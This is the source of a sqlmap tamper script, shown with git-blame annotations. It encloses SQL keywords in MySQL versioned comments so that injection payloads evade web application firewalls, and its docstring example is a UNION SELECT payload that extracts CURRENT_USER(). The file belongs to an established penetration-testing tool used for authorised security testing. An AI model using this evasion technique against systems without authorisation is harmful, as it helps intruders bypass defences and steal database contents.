2019-05-08 13:47:52 +03:00
|
|
|
#!/usr/bin/env python
|
2011-05-28 19:42:47 +04:00
|
|
|
|
|
|
|
"""
|
2024-01-04 01:11:52 +03:00
|
|
|
Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
|
2017-10-11 15:50:46 +03:00
|
|
|
See the file 'LICENSE' for copying permission
|
2011-05-28 19:42:47 +04:00
|
|
|
"""
|
|
|
|
|
2011-07-07 01:04:45 +04:00
|
|
|
import os
|
2011-05-28 19:42:47 +04:00
|
|
|
import re
|
|
|
|
|
2011-07-07 01:04:45 +04:00
|
|
|
from lib.core.common import singleTimeWarnMessage
|
2011-05-28 19:42:47 +04:00
|
|
|
from lib.core.data import kb
|
2011-07-07 01:04:45 +04:00
|
|
|
from lib.core.enums import DBMS
|
2011-05-28 19:42:47 +04:00
|
|
|
from lib.core.enums import PRIORITY
|
|
|
|
|
2011-06-30 11:52:13 +04:00
|
|
|
__priority__ = PRIORITY.HIGHER
|
2011-05-28 19:42:47 +04:00
|
|
|
|
2011-07-07 01:04:45 +04:00
|
|
|
def dependencies():
|
2011-07-08 17:43:34 +04:00
|
|
|
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
|
2011-07-07 01:04:45 +04:00
|
|
|
|
2012-12-03 17:27:01 +04:00
|
|
|
def tamper(payload, **kwargs):
|
2011-05-28 19:42:47 +04:00
|
|
|
"""
|
2018-07-31 03:18:33 +03:00
|
|
|
Encloses each non-function keyword with (MySQL) versioned comment
|
2011-07-07 01:04:45 +04:00
|
|
|
|
|
|
|
Requirement:
|
|
|
|
* MySQL
|
|
|
|
|
|
|
|
Tested against:
|
2011-07-08 17:43:34 +04:00
|
|
|
* MySQL 4.0.18, 5.1.56, 5.5.11
|
2011-07-07 01:04:45 +04:00
|
|
|
|
|
|
|
Notes:
|
|
|
|
* Useful to bypass several web application firewalls when the
|
|
|
|
back-end database management system is MySQL
|
2013-03-14 00:57:09 +04:00
|
|
|
|
|
|
|
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')
|
|
|
|
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
|
2011-05-28 19:42:47 +04:00
|
|
|
"""
|
|
|
|
|
|
|
|
def process(match):
|
|
|
|
word = match.group('word')
|
2011-06-30 11:52:13 +04:00
|
|
|
if word.upper() in kb.keywords:
|
2011-05-28 19:42:47 +04:00
|
|
|
return match.group().replace(word, "/*!%s*/" % word)
|
|
|
|
else:
|
|
|
|
return match.group()
|
|
|
|
|
|
|
|
retVal = payload
|
|
|
|
|
|
|
|
if payload:
|
2019-05-30 23:55:54 +03:00
|
|
|
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=[^\w(]|\Z)", process, retVal)
|
2011-05-28 19:42:47 +04:00
|
|
|
retVal = retVal.replace(" /*!", "/*!").replace("*/ ", "*/")
|
|
|
|
|
2012-10-25 12:10:23 +04:00
|
|
|
return retVal
|